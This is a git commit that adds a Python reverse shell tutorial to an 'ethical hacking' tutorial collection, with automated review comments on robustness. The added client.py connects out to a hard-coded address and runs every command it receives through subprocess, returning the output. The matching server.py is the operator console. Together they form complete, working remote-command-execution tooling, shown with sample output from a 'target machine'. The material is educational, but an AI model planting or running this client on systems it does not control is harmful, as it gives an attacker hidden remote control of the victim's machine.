
Commit 47907e9

add reverse shell tutorial
1 parent 7aaff67 commit 47907e9

4 files changed

+104
-0
lines changed

README.md

Lines changed: 1 addition & 0 deletions
Original file line number | Diff line number | Diff line change
@@ -15,6 +15,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
1515
- [How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-packets-scapy-python). ([code](scapy/http-sniffer))
1616
- [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
1717
- [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
18+
- [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
1819

1920
- ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
2021
- ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
Lines changed: 33 additions & 0 deletions
@@ -0,0 +1,33 @@
1+
# [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python)
2+
You don't need to install anything.
3+
- To run the server, simply write:
4+
```
5+
python server.py
6+
```
7+
**Output:**
8+
```
9+
Listening as 0.0.0.0:5003 ...
10+
```
11+
- Running the client (target machine):
12+
```
13+
python client.py
14+
```
15+
**Output:**
16+
```
17+
Server: Hello and Welcome
18+
```
19+
- The server will get notified once a client is connected, executing `dir` command on Windows remotely (in `server.py`):
20+
```
21+
192.168.1.103:58428 Connected!
22+
Enter the command you wanna execute:dir
23+
Volume in drive E is DATA
24+
Volume Serial Number is 644B-A12C
25+
26+
Directory of E:\test
27+
28+
09/24/2019 02:15 PM <DIR> .
29+
09/24/2019 02:15 PM <DIR> ..
30+
0 File(s) 0 bytes
31+
2 Dir(s) 89,655,123,968 bytes free
32+
Enter the command you wanna execute:exit
33+
```
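Review bot: The "Running the client (target machine)" step does not mention that `client.py` connects to a hard-coded `SERVER_HOST = "192.168.1.103"`, so on any other network `python client.py` fails to connect with no hint why. Add a line telling the reader to set `SERVER_HOST` to the address of the machine running `server.py`. The README should also state that the listener shown in the sample output (`0.0.0.0:5003`) accepts the first connection on every interface with no authentication or encryption, so readers know what the walkthrough exposes while the server is running.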
Lines changed: 28 additions & 0 deletions
@@ -0,0 +1,28 @@
1+
import socket
2+
import subprocess
3+
4+
SERVER_HOST = "192.168.1.103"
5+
SERVER_PORT = 5003
6+
BUFFER_SIZE = 1024
7+
8+
# create the socket object
9+
s = socket.socket()
10+
# connect to the server
11+
s.connect((SERVER_HOST, SERVER_PORT))
12+
13+
# receive the greeting message
14+
message = s.recv(BUFFER_SIZE).decode()
15+
print("Server:", message)
16+
17+
while True:
18+
# receive the command from the server
19+
command = s.recv(BUFFER_SIZE).decode()
20+
if command.lower() == "exit":
21+
# if the command is exit, just break out of the loop
22+
break
23+
# execute the command and retrieve the results
24+
output = subprocess.getoutput(command)
25+
# send the results back to the server
26+
s.send(output.encode())
27+
# close client connection
28+
s.close()
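Review bot: The loop has no check for an empty read at `command = s.recv(BUFFER_SIZE).decode()`. If the server closes the connection without sending `exit`, `recv` returns `b""` on every call, so the client runs an empty command and spins forever; add `if not command: break` before the `exit` comparison. Separately, a command that prints nothing makes `s.send(output.encode())` send zero bytes, which leaves the server blocked in its `recv`, so the reply needs some framing (for example a length prefix) rather than relying on one send per command.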
Lines changed: 42 additions & 0 deletions
@@ -0,0 +1,42 @@
1+
import socket
2+
3+
SERVER_HOST = "0.0.0.0"
4+
SERVER_PORT = 5003
5+
6+
BUFFER_SIZE = 1024
7+
8+
# create a socket object
9+
s = socket.socket()
10+
11+
# bind the socket to all IP addresses of this host
12+
s.bind((SERVER_HOST, SERVER_PORT))
13+
# make the PORT reusable
14+
# when you run the server multiple times in Linux, Address already in use error will raise
15+
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
16+
s.listen(5)
17+
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
18+
19+
# accept any connections attempted
20+
client_socket, client_address = s.accept()
21+
print(f"{client_address[0]}:{client_address[1]} Connected!")
22+
23+
# just sending a message, for demonstration purposes
24+
message = "Hello and Welcome".encode()
25+
client_socket.send(message)
26+
27+
while True:
28+
# get the command from prompt
29+
command = input("Enter the command you wanna execute:")
30+
# send the command to the client
31+
client_socket.send(command.encode())
32+
if command.lower() == "exit":
33+
# if the command is exit, just break out of the loop
34+
break
35+
# retrieve command results
36+
results = client_socket.recv(BUFFER_SIZE).decode()
37+
# print them
38+
print(results)
39+
# close connection to the client
40+
client_socket.close()
41+
# close server connection
42+
s.close()
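Review bot: `s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` is called after `s.bind((SERVER_HOST, SERVER_PORT))`, so the option is not in effect for this bind and the "Address already in use" error named in the comment can still occur; move the `setsockopt` call above `bind`. Also, `results = client_socket.recv(BUFFER_SIZE).decode()` reads at most 1024 bytes once per command, so longer output is cut off and the remainder shows up as the result of the next command; read in a loop until the full reply has arrived.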
